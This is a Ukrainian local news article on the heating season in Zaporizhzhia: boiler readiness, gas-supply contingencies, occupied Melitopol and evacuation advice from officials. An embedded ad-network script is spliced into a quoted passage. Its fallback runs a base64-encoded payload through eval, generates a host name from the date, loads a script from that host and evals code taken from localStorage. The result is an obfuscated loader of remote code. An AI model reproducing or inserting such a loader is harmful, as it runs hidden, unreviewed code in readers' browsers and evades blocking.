Про зниження стандартів температури опалення у квартирах запоріжців поки не йдеться (ВІДЕО)

Запоріжжя та область готуються до опалювального сезону. У обласному центрі до експлуатації нині готові 40 котелень з 61. Вже пройшли гідравлічні випробування 90% мереж. Також підготовлені 36 центральних теплових пунктів.

Про це Суспільному повідомили у концерні «Міські теплові мережі».

На випадок припинення постачання газу для котелень розробляється альтернативна програма.

«Розглядаються різні варіанти. Наприклад, перехід котелень на зріджений газ, перехід котелень на електроенергію та переобладнання. Також серед варіантів твердопаливні котли на маленьких котельнях. Все відбувається в штатному режимі. Маю надію, що люди це зрозуміють і паніки не буде», — каже Юрій Лютий, директор комунарського філіалу “МТМ”.


Юрій Лютий. Фото: Суспільне Запоріжжя

Юрій Лютий додає, що про зниження стандартів температури у квартирах поки не йдеться. Розглядаються різні варіанти на випадок аварійної ситуації, тоді можливе зменшення температури подачі у квартири.

Важкою залишається ситуація із населеними пунктами, що знаходяться на лінії вогню і в тимчасовій окупації. Так, щоб забезпечити опалювальний сезон в тимчасово окупованому Мелітополі потрібна деокупація, в іншому випадку лише евакуація містян — каже міський голова Іван Федоров.

Він зазначає, що 95% опалення в місті Мелітополь — це природний газ. Вже три тижні природного газу на тимчасово окупованих територіях немає через те, що під час боїв під Оріховом було повністю пошкоджений газопровід.


Іван Федоров. Фото з Фейсбук-сторінки Івана Федорова

«Звісно, це не дасть можливість запустити газові котельні. Також ми чітко розуміємо, що якщо люди почнуть грітися електрокамінами, то це навантаження на електричні мережі й вони не витримують. Тож потрібна деокупація і надшвидка робота наших комунальних служб і запуск опалювального сезону. Іншого варіанту поки ми не бачимо», — каже Федоров. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

На волонтерську допомогу та підтримку обласної влади розраховують в селі Новоданилівка, що в Оріхівській територіальній громаді. Нині там частково відновлюють електропостачання. Проте цих потужностей не вистачить, щоб обігріватися електроприладами.

«20 років тому у нас з’явився газ. Почали робить біль менш таке опалення, газове. Але в основі пічки. Тобто пічне опалення є, і я думаю люди переживуть, дай Боже, що ми їх відгонимо. Але сама велика проблема в тому, що у людей коштів немає. Те, що можуть самі заготовляють, брикети на опалення. Буде чим людям топить, не знаю в якій кількості», — каже Сергій Іващишин, староста села Новоданилівка Пологівського району.

Для населення, що мешкає в селах та містах на лінії вогню віцепрем’єр міністерка України Ірина Верещук рекомендує евакуюватися. І зробити це до настання холодів.


Ірина Верещук. Фото: Міністерство з питань реінтеграції тимчасово окупованих територій України

«Окупант всіляко використовує людей, які є на цій території, як живий щит. Так, знаючи, що ми будемо відвойовувати ці території їх уже, людей я маю на увазі, жінок і дітей використовують, як живий щит. І будуть це робити далі, якщо ми не приймемо для себе рішення, самі, що ви не можете ставати живим щитом і безпека наших дітей є справою всієї держави», — каже вона.

Як раніше повідомлялось, голова Запорізької ОВА Олександр Старух зазначив, що новий опалювальний сезон буде непростим, особливо у населених пунктів на лінії зіткнення і тимчасово окупованих територіях. Зокрема порадив запасатися дровами.

«Маємо перестрахуватися на всі випадки. Сезон, який вимагає від нас повної солідарності. Якщо у когось є батьки, які живуть у селі, треба дітям приїхати, і спланувати так, щоб допомогти батькам, і запастися дровами, або твердопаливними ресурсами іншими», — наголосив очільник Запорізької ОВА.

Підписуйтесь на Акцент в

(adsbygoogle = window.adsbygoogle || []).push({});

Источник: https://akzent.zp.ua/pro-znizhennya-standartiv-temperaturi-opalennya-u-kvartirah-zaporizhtsiv-poki-ne-jdetsya-video/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top